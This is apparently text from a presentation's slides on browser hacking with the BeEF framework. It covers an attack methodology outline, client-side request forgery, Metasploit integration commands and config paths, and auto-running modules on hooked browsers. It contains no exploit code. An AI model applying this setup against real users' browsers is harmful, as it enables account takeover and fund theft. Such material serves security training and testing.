  • 22. Browser Hacking Methodology • Gaining control • Fingerprinting • Retain control • Bypassing SOP • Attacking users • Attacking extensions • Attacking web applications • Attacking browsers • Attacking plugins • Attacking networks
  • 24.
  • 29. Client-Side Request Forgery • Can be used to make internal or external requests from the victim’s PC • Depending on severity, could allow an attacker to automatically transfer funds or reset a users passwords, etc…
  • 33. Integration • Execute Metasploit exploits directly through BeeF’s web UI… • Get Metasploit DB user/pass: msfconsole -x ‘load msgrpc;’ • Update Config with MSF DB user/pass: /usr/share/beef-xss/extensions/metasploit/config.yml • Enable the Metasploit module in BeeF config: /usr/share/beef-xss/config.yml
  • 36. Automating Modules By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
  • 37. Demo